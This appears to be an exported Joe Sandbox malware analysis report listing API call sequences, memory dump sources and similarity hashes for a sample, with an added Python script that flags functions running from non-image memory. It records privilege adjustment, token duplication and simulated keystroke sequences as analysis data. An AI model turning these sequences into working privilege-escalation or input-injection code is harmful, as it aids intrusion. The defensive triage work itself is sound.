                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4214: FreeLibrary.KERNEL32(00000000,?), ref: 00EC4247
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EC39FE,?,00000001), ref: 00EC41DB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4291: FreeLibrary.KERNEL32(00000000), ref: 00EC42C4
Memory Dump Source (same dump, associated files and IDA snapshot as the first entry above)
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
• Opcode ID: 3040ae09a9db44951d3c9f7896faddb5639da8ffcb43746473e080d583074474
• Instruction ID: c22dec0e4e8a930e160019f37a77b134c1f9abc526959c9762cb31b89c976960
• Opcode Fuzzy Hash: 3040ae09a9db44951d3c9f7896faddb5639da8ffcb43746473e080d583074474
• Instruction Fuzzy Hash: 4211E7B1600306AACB14AB74DE27F9E77E59F40710F10842DF596B71D1DA76DA02AB60
APIs
Memory Dump Source (same dump, associated files and IDA snapshot as the first entry above)
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: dca09983ae4cb2ff8785535fcc9fc1e73332e4ed3dd530fb089b8ab9fc53e8c5
• Instruction ID: 906bbc51a4fb286dd23081f605993b89a7dbf46dfa5387fa0740f4a5762f4bb3
• Opcode Fuzzy Hash: dca09983ae4cb2ff8785535fcc9fc1e73332e4ed3dd530fb089b8ab9fc53e8c5
• Instruction Fuzzy Hash: D52125705086018FDB24DF68D444B1ABBE1FF84304F18596EE99A6B362C732E846DF52
APIs
• ___lock_fhandle.LIBCMT ref: 00EEAFC0
  • Part of subcall function 00EE7BDA: __getptd_noexit.LIBCMT ref: 00EE7BDA
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
Memory Dump Source (same dump, associated files and IDA snapshot as the first entry above)
Similarity
• API ID: __getptd_noexit$___lock_fhandle
• String ID:
• API String ID: 1144279405-0
• Opcode ID: 36fa84e1257d9b43af123f8c828ac141d38429f8d05caab3b47626b93a9edfd2
• Instruction ID: e4f69e6356a72bfd3235a995ed14f381dc867b0a3f14bc681c092545640921f4
• Opcode Fuzzy Hash: 36fa84e1257d9b43af123f8c828ac141d38429f8d05caab3b47626b93a9edfd2
• Instruction Fuzzy Hash: A611B6728046CC8FD7116FA6D8413AB76A19F41335F296250E4743F2E3C7B4AD0097A1
APIs
• ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00F5DC00,00000000,?,00EC464E,00F5DC00,00010000,00000000,00000000,00000000,00000000), ref: 00ECC337
Memory Dump Source (same dump, associated files and IDA snapshot as the first entry above)
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: c5d8448950f76dd89f364b96f658a22e954397a702e2b71ac90460c111cb122b
• Instruction ID: 33d78cb9397e75f17eba5a66c841b3391f76e2548afbbe3200b8e278b3da548d
• Opcode Fuzzy Hash: c5d8448950f76dd89f364b96f658a22e954397a702e2b71ac90460c111cb122b
• Instruction Fuzzy Hash: 0F114831200B849FD720CE4AD984F66B7E9AF45758F24C41DE4AE96A50C772E846CB60
Memory Dump Source (same dump, associated files and IDA snapshot as the first entry above)
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                                                      • Opcode ID: e6c6f487e041fcac59e831272422d20e9d2018d4bf7707e35853961444fccb41
                                                                                                                                                                                                                                                      • Instruction ID: 846e5fc66fadebbca651aa08a4795369e0f6559bcae789b9db34b571ad752ac0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6c6f487e041fcac59e831272422d20e9d2018d4bf7707e35853961444fccb41
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A01867150010DAECF05EF74C992DFEBBB4EF10314F108029B562A71E5EA319A4ADB60
APIs
• __lock_file.LIBCMT ref: 00EE2AED
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 9935cd194d8032012ca9fea4bcde6b0f2772adbec44572e29434068e88a23ac3
• Instruction ID: a5514adb825408c20e8fe83a1f55736a00624e3c0a2a5c520da73101a9f8e54c
• Opcode Fuzzy Hash: 9935cd194d8032012ca9fea4bcde6b0f2772adbec44572e29434068e88a23ac3
• Instruction Fuzzy Hash: 81F0C83150028DDADF21AFB68C0239F36E97F40314F146429B518BB191CB748A51DB51
APIs
• FreeLibrary.KERNEL32(?,?,?,?,?,00EC39FE,?,00000001), ref: 00EC4286
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 19e0a7da87909169beb00c1268f5343e8aecd3ea54b1443e943c018aa60e9c47
• Instruction ID: 7ce1a0a1d8321e9fa607e12a09b76e383e7bbe57cec71a8dd2d25713583ace16
• Opcode Fuzzy Hash: 19e0a7da87909169beb00c1268f5343e8aecd3ea54b1443e943c018aa60e9c47
• Instruction Fuzzy Hash: 35F0A9B1404302CFCB388FA0D8A1D66BBE0BF003293209A3EF1C6A2660C7329940DF40
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC40C6
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: LongNamePath
• String ID:
• API String ID: 82841172-0
• Opcode ID: 2b373cbb96f756cd1a70b37c6868a3ad0a87324bd848ac092a1b2b98b6efd8ab
• Instruction ID: 61bf29f575385b4e3b968a66c5105104793f7bfe16a90745fca2744b18d9b27a
• Opcode Fuzzy Hash: 2b373cbb96f756cd1a70b37c6868a3ad0a87324bd848ac092a1b2b98b6efd8ab
• Instruction Fuzzy Hash: 59E0C2366002285BC711A658CC46FEF77EDDFC86A0F0900B9FE09E7244EA64E9819690
APIs
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
• Instruction ID: a66e38490483530d62ecc361b6b892ef90626f5479e32337b92a94e562ba63ff
• Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
• Instruction Fuzzy Hash: 3BE092B0504B449BD7388B24D800BE3B3E0EB05315F00091CF29A93282EB6278419659
APIs
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00F340EA,00000000,00000000,00000000), ref: 00EC47A9
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: cfbd7bd167bd937b1963ba3bc1795a37f5f190fd96098c105bb0dcd756684132
                                                                                                                                                                                                                                                      • Instruction ID: cd7f42b9ea7284f69531bc4ee0d0bf2343df9b582c3f50a6f91128a922d8d7db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfbd7bd167bd937b1963ba3bc1795a37f5f190fd96098c105bb0dcd756684132
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16D0C97464020CBFFB00CB90DC46F9A7BBCEB45B58F200194FA00A62D0D2F2BE409B55
APIs
• Sleep.KERNELBASE(000001F4), ref: 0116DAE1
Memory Dump Source
• Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116b000_file.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: af4c90afde1e862587d09ca887b4c7150ec0a596b50f23142eed96e3ecfeed93
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: FEE0E67494410EDFDB00EFF8D54969E7FB4EF04301F1001A1FD01D2281DB719D608A62
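The Sleep(0x1F4 = 500 ms) call above is the one function in this run whose call site (0116DAE1) lies in a region the sandbox marks "based on PE: false", i.e. memory it could not map back to the loaded image at 00EC0000. That is the property worth pulling out of these entries when triaging a report that also flags process hollowing and thread injection. The script below is an added example, not Joe Sandbox tooling: it parses per-function text blocks of the form shown on this page (APIs / Memory Dump Source / Similarity), decodes Sleep arguments, and flags entries whose API calls are issued from non-image memory. The sample text is constructed from entries on this page. Decoding the dotted .sdmp file name fields as page protection and memory type is an assumption of this example, not something the report documents.

```python
"""Triage helper for Joe Sandbox per-function entries (added example, not report tooling)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Documented Windows MEMORY_BASIC_INFORMATION constants.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000

# Constructed from entries on this page ('Download File' link residue removed).
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000001F4), ref: 0116DAE1
Memory Dump Source
• Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
Similarity
• API ID: Sleep
• String ID:
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F2B1CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
"""

API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int  # address of the call site


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    based_on_pe: Optional[bool] = None
    meta: Dict[str, str] = field(default_factory=dict)

    def region_fields(self) -> Tuple[Optional[int], Optional[int]]:
        """(Protect, Type) of the dumped region.
        ASSUMPTION: the .sdmp name is <proc>.<stage>.<id>.<base>.<protect>.<state>.<type>.<n>;
        the page does not document this layout, so treat the result as a hint only."""
        parts = self.source_file.rsplit(".", 1)[0].split(".")
        if len(parts) < 7:
            return None, None
        return int(parts[4], 16), int(parts[6], 16)

    def suspicious(self) -> bool:
        """API calls issued from memory the sandbox could not map to a PE image."""
        return self.based_on_pe is False and bool(self.apis)


def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # each function entry opens with its API list
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers (Memory Dump Source, Similarity, Strings)
        m = API_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.source_file, cur.offset = m.group("file"), int(m.group("off"), 16)
            cur.based_on_pe = m.group("pe") == "true"
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m.group("key").strip()] = m.group("val").strip()
    return entries


def sleep_ms(entry: FunctionEntry) -> List[int]:
    """Decode dwMilliseconds of each Sleep call whose argument the sandbox resolved."""
    return [int(c.args[0], 16) for c in entry.apis if c.name == "Sleep" and c.args and c.args[0] != "?"]


def triage(text: str) -> List[dict]:
    rows = []
    for e in parse_entries(text):
        protect, mtype = e.region_fields()
        rows.append({
            "api_id": e.meta.get("API ID", ""),
            "offset": e.offset,
            "based_on_pe": e.based_on_pe,
            "rwx_private": protect == PAGE_EXECUTE_READWRITE and mtype == MEM_PRIVATE,
            "suspicious": e.suspicious(),
            "sleep_ms": sleep_ms(e),
            "calls": [f"{c.module}!{c.name}@{c.ref:08X}" for c in e.apis],
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run against the whole exported report, the `suspicious` rows are the functions to open first in the IDA snapshot: they are the ones executing from memory that was written at runtime rather than mapped from file.exe.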
APIs
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00F2F87D
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F2F8DC
• GetWindowLongW.USER32(?,000000F0), ref: 00F2F919
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F2F940
• SendMessageW.USER32 ref: 00F2F966
• _wcsncpy.LIBCMT ref: 00F2F9D2
• GetKeyState.USER32(00000011), ref: 00F2F9F3
• GetKeyState.USER32(00000009), ref: 00F2FA00
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F2FA16
• GetKeyState.USER32(00000010), ref: 00F2FA20
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F2FA4F
• SendMessageW.USER32 ref: 00F2FA72
• SendMessageW.USER32(?,00001030,?,00F2E059), ref: 00F2FB6F
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00F2FB85
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F2FB96
• SetCapture.USER32(?), ref: 00F2FB9F
• ClientToScreen.USER32(?,?), ref: 00F2FC03
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F2FC0F
• InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F2FC29
• ReleaseCapture.USER32 ref: 00F2FC34
• GetCursorPos.USER32(?), ref: 00F2FC69
• ScreenToClient.USER32(?,?), ref: 00F2FC76
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00F2FCD8
• SendMessageW.USER32 ref: 00F2FD02
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00F2FD41
• SendMessageW.USER32 ref: 00F2FD6C
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F2FD84
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F2FD8F
• GetCursorPos.USER32(?), ref: 00F2FDB0
• ScreenToClient.USER32(?,?), ref: 00F2FDBD
• GetParent.USER32(?), ref: 00F2FDD9
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00F2FE3F
• SendMessageW.USER32 ref: 00F2FE6F
• ClientToScreen.USER32(?,?), ref: 00F2FEC5
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F2FEF1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00F2FF19
• SendMessageW.USER32 ref: 00F2FF3C
• ClientToScreen.USER32(?,?), ref: 00F2FF86
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F2FFB6
• GetWindowLongW.USER32(?,000000F0), ref: 00F3004B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 2516578528-4164748364
• Opcode ID: 7685c15193403143203dd4e424128f51d1b08b2edba9dd4b38bba75e2f0cd3b2
• Instruction ID: d086910eb464ff4b771bb15ef11f5a8059e4de23054329056bcf5fe2091b98ad
• Opcode Fuzzy Hash: 7685c15193403143203dd4e424128f51d1b08b2edba9dd4b38bba75e2f0cd3b2
• Instruction Fuzzy Hash: E132DE78A14254EFDB10CF64D884BAABBB8FF49364F040639F995872A1D731DC09EB52
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F2B1CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
• Opcode ID: d036e1d7fa502fb8ff7e94831b5fa1d1f3bb94b6df9a5765ab2c4979d8cf7590
• Instruction ID: a5468ae72a11ae713c1125cb4382d33b9c1150b0ae6fe9dd855487499fc08cfb
• Opcode Fuzzy Hash: d036e1d7fa502fb8ff7e94831b5fa1d1f3bb94b6df9a5765ab2c4979d8cf7590
• Instruction Fuzzy Hash: 0B12E171A00229ABEB248F64EC59FAE7BF8FF45720F104119F915EB2D1DB748942EB11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 00EDEB4A
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F33AEA
                                                                                                                                                                                                                                                      • IsIconic.USER32(000000FF), ref: 00F33AF3
                                                                                                                                                                                                                                                      • ShowWindow.USER32(000000FF,00000009), ref: 00F33B00
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00F33B0A
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F33B20
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F33B27
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F33B33
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F33B44
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F33B4C
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F33B54
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00F33B57
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B6C
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33B77
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B81
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33B86
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B8F
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33B94
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B9E
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33BA3
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00F33BA6
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F33BCD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: 258a09da7224775c459d453883dae641e08eec2a48bdab9d71a3671a3b891bd9
                                                                                                                                                                                                                                                      • Instruction ID: f01cd1fb95fb63355dd37c24325758552cf2a1e36dcb2c84691643b031a32f24
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 258a09da7224775c459d453883dae641e08eec2a48bdab9d71a3671a3b891bd9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED31A776B4031CBBEB206B659C49F7F7E6CEB85B60F114015FE05EA1D1DAB05D00BAA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: GetLastError.KERNEL32 ref: 00EFB1BA
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFAD08
                                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EFAD5A
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EFAD6B
                                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EFAD82
                                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 00EFAD9B
                                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00EFADA5
                                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EFADBF
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EFACC0), ref: 00EFAB99
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAB84: CloseHandle.KERNEL32(?,?,00EFACC0), ref: 00EFABAB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                                      • API String ID: 2063423040-1027155976
